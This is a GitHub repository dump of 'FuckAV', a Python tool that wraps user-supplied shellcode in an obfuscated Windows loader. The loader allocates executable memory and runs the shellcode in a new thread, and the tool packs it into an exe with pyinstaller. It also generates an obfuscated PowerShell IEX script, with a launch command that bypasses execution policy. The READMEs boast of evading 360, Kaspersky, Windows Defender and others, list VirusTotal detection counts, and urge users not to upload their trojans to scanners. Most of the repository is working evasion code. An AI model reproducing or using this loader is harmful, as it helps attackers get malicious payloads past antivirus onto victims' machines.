├── 1.jpg ├── 1234.ico ├── 2.png ├── English_readme.md ├── English_readme1 ├── FuckAV.py ├── README.md ├── decode.py ├── img ├── loader.py ├── powershell.py ├── requirement.txt └── upx ├── GIF 2021-10-25 18-00-14.gif ├── powershell.gif └── upx.exe /1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/iframepm/FuckAV/1bdc340481b316471195b70a0eefe59fdee152a8/1.jpg -------------------------------------------------------------------------------- /1234.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/iframepm/FuckAV/1bdc340481b316471195b70a0eefe59fdee152a8/1234.ico -------------------------------------------------------------------------------- /2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/iframepm/FuckAV/1bdc340481b316471195b70a0eefe59fdee152a8/2.png -------------------------------------------------------------------------------- /English_readme.md: -------------------------------------------------------------------------------- 1 | # FuckAV 2 | ## [中文](https://github.com/iframepm/FuckAV/blob/main/README.md) [English](https://github.com/iframepm/FuckAV/blob/main/English_readme.md) 3 | 4 | [![Travis](https://img.shields.io/badge/%E7%89%88%E6%9C%AC-1.2-red)](1) [![Travis](https://img.shields.io/badge/Time-9--13-brightgreen)](1) [![Travis](https://img.shields.io/badge/python-3.6-brightgreen)](1) 5 | ## Instructions 6 | python fuckav.py 7 | 8 | input number:1 9 | 10 | input shellcode (Example:\xfc\x48\.......\x56\x78) 11 | 12 | input number 13 | ## Record 14 | - As of 2021-8-20,bypass:360、HipsTray、McAfee、Windows denfend、Kaspersky、Symantec VT(10/67) 15 | - As of 2021-8-20,bypass:360、HipsTray、McAfee、Windows denfend、Symantec VT(10/67) 16 | - As of 2021-8-20,bypass:360、HipsTray、McAfee、Windows denfend、Kaspersky(static state)、Symantec VT(10/67) 17 | - As of 2021-9-23,bypass:360、HipsTray、Windows denfend、Kaspersky(static state) VT(9/67) 18 | 19 | ![image](https://z3.ax1x.com/2021/08/20/fO7itK.jpg) 20 | ![image](https://z3.ax1x.com/2021/08/20/fOqMA1.png) 21 | ![image](https://s3.bmp.ovh/imgs/2021/09/44082aac1e090b1d.png) 22 | -------------------------------------------------------------------------------- /English_readme1: -------------------------------------------------------------------------------- 1 | [英文文档](https://github.com/iframepm/FuckAV/) 2 | -------------------------------------------------------------------------------- /FuckAV.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | from colorama import init,Fore,Back,Style 4 | from PIL import Image 5 | from PIL import ImageDraw 6 | from PIL import ImageFont 7 | import powershell 8 | import random 9 | 10 | 11 | init(autoreset=True) 12 | # 脚本采用python3.7编写 13 | # 采用pyinstaller打包,使用之前请安装pyinstaller 14 | # 运行之前先确认一下pip库有没有安装 15 | # 因为开源了嘛,估计要不了半个月就会被加入360豪华套餐了,但是整个程序够简单,被杀了再去改几个特征码照样又可以免杀半个月 16 | # 反正我自己用了半个月,一直都是国内杀软全过 17 | # 保持更新,但是频率比较慢,因为我只是个没用的安服 18 | # 不得不说这个脚本确实有很多地方是在造轮子,但是是有意造的轮子,看似造轮子,实则是为了以后方便魔改(说白了就是菜,因为我是一个没用的安服) 19 | 20 | print(f""" 21 | ╔============================================================================╗ 22 | ║ ║ 23 | ║ ███████╗ ██╗ ██╗ ██████╗ ██╗ ██╗ █████╗ ██╗ ██╗ ║ 24 | ║ ██╔════╝ ██║ ██║ ██╔════╝ ██║ ██╔╝ ██╔══██╗██║ ██║ ║ 25 | ║ █████╗ ██║ ██║ ██║ █████╔╝ ███████║██║ ██║ ║ 26 | ║ ██╔══╝ ██║ ██║ ██║ ██╔═██╗ ██╔══██║╚██╗ ██╔╝ ║ 27 | ║ ██║ ╚██████╔╝ ╚██████╗ ██║ ██╗ ██║ ██║ ╚████╔╝ ║ 28 | ║ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═══╝ V2.0 ║ 29 | ║ Author:1frame Time:2021-10-25 ║ 30 | ╚============================================================================╝ 31 | """) 32 | print('\033[1;31;40m''[*]''\033[1;37;40m'" exp: python FuckAV.py") 33 | print() 34 | print('\033[1;34;40m''[*]''\033[1;37;40m'" exe用法: 直接运行shell.exe即可 ") 35 | print() 36 | print('\033[1;33;40m''[*]''\033[1;37;40m'" 安装依赖库: pip install -r requirement.txt ") 37 | print() 38 | print("====================================================================") 39 | print() 40 | print('\033[1;31;40m''[1]''\033[1;37;40m'": 生成 exe") 41 | print('\033[1;31;40m''[2]''\033[1;37;40m'": 生成 powershell脚本") 42 | xz=input(f""" 43 | [♥] 选择 1/2: """) 44 | 45 | def getRandomStr(): 46 | chars = '霖阿什顿操大撒德哈卡我被哈韩牛按客户都是嗷对啊空间很聪安徽的abcdefghigklmnopqrstu'; 47 | charLen = len(chars) 48 | pwd = '' 49 | resultLen = random.randint(5, 7) 50 | while len(pwd) < resultLen: 51 | pwd += chars[random.randint(0,charLen-1)] 52 | return pwd 53 | 54 | def GeticoDir(dir,ext = None): 55 | allfiles = [] 56 | needExtFilter = (ext != None) 57 | for root,dirs,files in os.walk(dir): 58 | for filespath in files: 59 | filepath = os.path.join(root, filespath) 60 | extension = os.path.splitext(filepath)[1][1:] 61 | if needExtFilter and extension in ext: 62 | allfiles.append(filepath) 63 | elif not needExtFilter: 64 | allfiles.append(filepath) 65 | return allfiles 66 | 67 | def rename_ico(): 68 | global ico 69 | global rename 70 | rename=getRandomStr() 71 | ico=GeticoDir('.\\', ['ico'])[0] 72 | print(ico) 73 | os.rename(ico, '{0}.ico'.format(rename)) 74 | ico = rename+'.ico' 75 | 76 | 77 | def filename(): 78 | l=open('fliename.txt','w+') 79 | l.write(rename) 80 | l.close() 81 | 82 | if xz=="1": 83 | import loader 84 | rename_ico() 85 | filename() 86 | from decode import shellname 87 | os.system ("echo pyinstaller -F -w -i {0} {1}.py>{1}.bat ".format(ico,shellname)) 88 | os.system("{0}.bat ".format(shellname)) 89 | os.system('del {0}.py'.format(shellname)) 90 | os.system('del {0}.bat'.format(shellname)) 91 | os.system('del {0}.spec'.format(shellname)) 92 | print() 93 | time.sleep(2) 94 | print('\033[1;32;40m''[♥]''\033[1;37;40m'"===================EXE打包完成====================") 95 | print('\033[1;34;40m''[*]''\033[1;37;40m'" exe路径:\dist\{0}.exe".format(shellname)) 96 | os.system("pause") 97 | os.system("python fuckav.py") 98 | elif xz=="2": 99 | powershell.powershell_fix() 100 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FuckAV 2 | ### 项目倒闭,停止维护! 3 | ### powershell免杀还能用,exe稍微改一下还能过 4 | ## [中文](https://github.com/iframepm/FuckAV/blob/main/README.md) [English](https://github.com/iframepm/FuckAV/blob/main/English_readme.md) 5 | 6 | [![Travis](https://img.shields.io/badge/%E7%89%88%E6%9C%AC-1.2-red)](1) [![Travis](https://img.shields.io/badge/Time-9--13-brightgreen)](1) [![Travis](https://img.shields.io/badge/python-3.6-brightgreen)](1) 7 | 8 | 农民工写的免杀工具,2021-9-13 9 | ## 更新记录 10 | ### 时间 2021-9-13 版本:1.2 11 | 1. shellcode加载方式由远程加载改为了本地加载,shellcode写死在了exe里面,因为远程加载太麻烦,点开直接上线更方便,现在直接运行shell.exe就能上线 12 | 2. 增加了upx压缩,缩小了exe体积 13 | 3. 自动更新图标文件的md5,防止图标资源成为查杀的特征码,现在不需要每隔一段时间次就替换图标文件 14 | 4. 支持powershell脚本免杀(还没开发的,就这几天弄) 15 | 5. 加载器已经被杀软分析透了,得大改才能活下去,开源之后差不多活了两个月,也还算可以了 16 | ### 时间 2021-9-23 版本:1.3 17 | 1. 去除了upx压缩,压缩率太低,没啥用,画蛇添足 18 | 2. 每次都会重置ico还有py的文件名 19 | 3. 封装了主main依赖库 20 | ### 时间 2021-10-25 版本:2.0 21 | 1. 加入了powershell免杀 22 | ## 温馨提示 23 | > 使用之前安装一下python库 pip install -r requirement.txt,出现啥依赖库报错,大家自己解决吧,因为这个每个人的环境不一样,解决个依赖库报错相信不是啥难题 24 | 25 | - 脚本采用python3.7编写,Windows环境!!!!!! 26 | 27 | - 采用pyinstaller打包,使用之前请安装pyinstaller 28 | 29 | - 运行之前先确认一下pip库有没有安装 30 | 31 | - 环境实在报错就用fuckav.exe 32 | 33 | - 因为开源了嘛,估计要不了半个月就会被加入360豪华套餐了,但是整个程序够简单,被杀了再去改几个特征码照样又可以免杀半个月,反正我自己用了半个月,一直都是国内杀软全过,保持更新,但是频率比较慢,因 为我只是个没用的安服 34 | 35 | - 不得不说这个脚本确实有很多地方是在造轮子,但是是有意造的轮子,看似造轮子,实则是为了以后方便魔改(说白了就是菜,因为我是一个没用的安服) 36 | 37 | - 因为脚本逻辑实在太过于简单,没啥技术含量,所以大家尽量还是不要把马子上传到云杀箱了吧,为了免杀活更久一点 38 | ## 存活动态 39 | - 截止到 2021-8-20,360、火绒、Windows denfend、卡巴静态全过 40 | - 截止到 2021-8-28,360、火绒、Windows denfend、卡巴静态全过 2021-8-28更新 41 | - 截止到 2021-9-13,360、火绒、Windows denfend、静态全过,无法过360动态查杀(约一分钟之后就会报毒,可以再查杀之前选择进程注入。) 42 | - 截止到 2021-9-23,360、火绒动静态全过 Windows denfend、卡巴静态全过,更新了一下改了改规则,又能过了....不愧是md5查杀器 43 | - 截止到 2021-9-26,360、火绒动静态全过 Windows denfend、卡巴静态全过,Windows denfend、卡巴 动态杀 44 | - 截止到 2021-10-25,360、火绒动静态全过,卡巴,Windows denfend过不了(没有WD环境,懒得测) 45 | - 截止到 2022-6-22,停止更新了,我太懒了,本身不是做免杀的,而且涉及的技术栈太过于基础,没有维护下去的必要,后续可能会开发其他的免杀或者写点文章 46 | ### VT查杀率: 47 | ![image](https://s3.bmp.ovh/imgs/2021/09/44082aac1e090b1d.png) 48 | ### exe: 49 | ![image](https://z3.ax1x.com/2021/10/25/54odB9.gif) 50 | ### powershell: 51 | ![image](https://z3.ax1x.com/2021/10/25/544WBn.gif) 52 | -------------------------------------------------------------------------------- /decode.py: -------------------------------------------------------------------------------- 1 | import os 2 | import random 3 | 4 | def getRandomStr(): 5 | chars = '霖阿什顿操大撒德哈卡我被哈韩牛按客户都是嗷对啊空间很聪安徽的abcdefghigklmnopqrstu'; 6 | charLen = len(chars) 7 | pwd = '' 8 | resultLen = random.randint(5, 9) 9 | while len(pwd) < resultLen: 10 | pwd += chars[random.randint(0,charLen-1)] 11 | return pwd 12 | 13 | x=open("fliename.txt") 14 | e=x.readlines() 15 | x.close() 16 | shellname=e[0] 17 | 18 | f=open("hex.txt") 19 | a=f.readlines() 20 | f.close() 21 | neiro="""import requests 22 | import pickle 23 | import sys 24 | import base64 25 | import string 26 | import re 27 | import os 28 | import base64 29 | import ctypes 30 | global code 31 | code=[] 32 | code={0}""".format(a)+""" 33 | a=re.findall("(\w)",code[1]) 34 | def decode_string(): 35 | n=0 36 | x=0 37 | bianliang=code[0] 38 | words=a 39 | counts=int(code[2]) 40 | for key in words: 41 | global num 42 | num = 0 43 | def number(): 44 | global num 45 | num = num + 1 46 | return str(num) 47 | bianliang=bianliang.format(words[0],"{"+str(x)+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 48 | ,"{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 49 | ,"{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 50 | ,"{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 51 | ,"{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 52 | ,"{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 53 | ,"{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}","{"+number()+"}" 54 | ) 55 | try: 56 | words[0] = words[n+1] 57 | except: 58 | pass 59 | n = n + 1 60 | if n>counts: 61 | break 62 | return bianliang 63 | 64 | shellcode=str(decode_string()) 65 | code1="8003636275696{0}74696{2}730{1}657865630{1}710058230000002865786563286261736536342{2}6236346465636{3}6465287368656{0}6{0}636{3}646529292971018571025271032{2}".format("c","a","e","f") 66 | a1=bytes.fromhex(code1) 67 | pickle.loads(a1) 68 | """ 69 | w=open('{0}.py'.format(shellname),'w+') 70 | w.write(neiro) 71 | w.close() -------------------------------------------------------------------------------- /img: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /loader.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import string 3 | import re 4 | import os 5 | from colorama import init,Fore,Back,Style 6 | init(autoreset=True) 7 | 8 | exec("e=b'" + input("[*] ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ [*] Input shellcode: ") + "'") 9 | exec("st=e.hex()") 10 | try: 11 | times = int(input("[*] ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ [*] Number of encryption(35-49):")) 12 | except: 13 | print('\033[1;31;40m'"plz Input Number!") 14 | 15 | wocao="""import ctypes 16 | import string 17 | import sys 18 | shell="{0}" 19 | buf = bytes.fromhex(shell) 20 | shellcode = bytearray(buf) 21 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 22 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) 23 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) 24 | ctypes.windll.kernel32.RtlMoveMemory( 25 | ctypes.c_uint64(ptr), 26 | buf, 27 | ctypes.c_int(len(shellcode)) 28 | ) 29 | handle = ctypes.windll.kernel32.CreateThread( 30 | ctypes.c_int(0), 31 | ctypes.c_int(0), 32 | ctypes.c_uint64(ptr), 33 | ctypes.c_int(0), 34 | ctypes.c_int(0), 35 | ctypes.pointer(ctypes.c_int(0)) 36 | ) 37 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))""".format(st) 38 | 39 | def Remove_str(shuzu): 40 | shuzu=sorted(list(set(shuzu))) 41 | return shuzu 42 | 43 | def fix_string(bianliang): 44 | global num 45 | danci = [] 46 | danci = re.findall("[a-zA-Z]", bianliang) 47 | changdu = len(Remove_str(danci)) 48 | n = 0 49 | a=[] 50 | if times>changdu: 51 | print('\033[1;31;40m'"[*] ▇▇▇▇▇▇▇▇▇▇▇ [*] The value is too large,The max value:"+str(changdu)+"!!!") 52 | print('\033[1;31;40m'"[*] ▇▇▇▇▇▇▇▇▇▇▇ [*] Retry!") 53 | 54 | else: 55 | for cishu in range(0,times,1): 56 | st=Remove_str(danci)[n] 57 | bianliang=bianliang.replace(st,"{"+str(cishu)+"}") 58 | a.append(st) 59 | n=n+1 60 | if n>times: 61 | break 62 | number = len(a) 63 | num=number 64 | return bianliang,a,number 65 | 66 | encodestr = base64.b64encode(wocao.encode('utf-8')) 67 | jiazaiqi=str(encodestr,'utf-8') 68 | print(fix_string(jiazaiqi)[0]) 69 | f=open('hex.txt','w+') 70 | f.write(fix_string(jiazaiqi)[0]+"\n") 71 | f.write(str(fix_string(jiazaiqi)[1])+"\n") 72 | f.write(str(fix_string(jiazaiqi)[2])) 73 | f.close() 74 | 75 | 76 | -------------------------------------------------------------------------------- /powershell.py: -------------------------------------------------------------------------------- 1 | # -!- coding: utf-8 -!- 2 | import base64 3 | import re 4 | 5 | # C:\Users\iframe\OneDrive\桌面\test.ps1 6 | def powershell_fix(): 7 | f=open(input('输入ps1路径:')) 8 | payload=f.read() 9 | print(payload) 10 | payload=str(base64.b64encode(payload.encode('utf-8'))) 11 | payload=re.findall('^(?:b\')(.+)(?:\')$',payload)[0] 12 | print(payload) 13 | length=len(payload) 14 | payload1=payload[0:length//2] 15 | payload2=payload[length//2:-1]+"=" 16 | def fix(str): 17 | q=re.sub('(x)','{0}',str) 18 | q=re.sub('(S)','{1}',q) 19 | return q 20 | py=f""" 21 | $D=@{{}} 22 | $d.d="x" 23 | $D.a="in" 24 | $D.z="S" 25 | $id=@("i","e","{{0}}","{{1}}") -f $d.d,$D.z""" 26 | py1=""" 27 | $D.N="{0}" -f $id[4],$id[6] 28 | $D.C="{1}" -f $id[4],$id[6]""".format(fix(payload1),fix(payload2)) 29 | py2=f""" 30 | ("[{{3}}y{{3}}tem.Te{{4}}t.Encoding]::UTF8.Get{{3}}tr{{2}}g([{{3}}y{{3}}tem.Convert]::FromBa{{3}}e64Str{{2}}g(""{{0}}{{1}}""))"-f $D.N,$D.c,$D.a,$D.z,$id[4]) | &(GAL I*X) | &("{{0}}{{1}}{{2}}" -f $id[0],$id[2],$d.d) 31 | """ 32 | print(py+py1+py2) 33 | print("\n"+"\n"+"生成在根目录下powershell.ps1中") 34 | print("\n" + "上线命令:powershell.exe -ExecutionPolicy Bypass -File .\powershell.ps1") 35 | f=open(".\powershell.ps1","w+") 36 | f.write(py+py1+py2) 37 | f.close() 38 | -------------------------------------------------------------------------------- /requirement.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | time 3 | os 4 | ctypes 5 | pickle 6 | requests 7 | sys 8 | base64 9 | string 10 | re 11 | -------------------------------------------------------------------------------- /upx/GIF 2021-10-25 18-00-14.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/iframepm/FuckAV/1bdc340481b316471195b70a0eefe59fdee152a8/upx/GIF 2021-10-25 18-00-14.gif -------------------------------------------------------------------------------- /upx/powershell.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/iframepm/FuckAV/1bdc340481b316471195b70a0eefe59fdee152a8/upx/powershell.gif -------------------------------------------------------------------------------- /upx/upx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/iframepm/FuckAV/1bdc340481b316471195b70a0eefe59fdee152a8/upx/upx.exe --------------------------------------------------------------------------------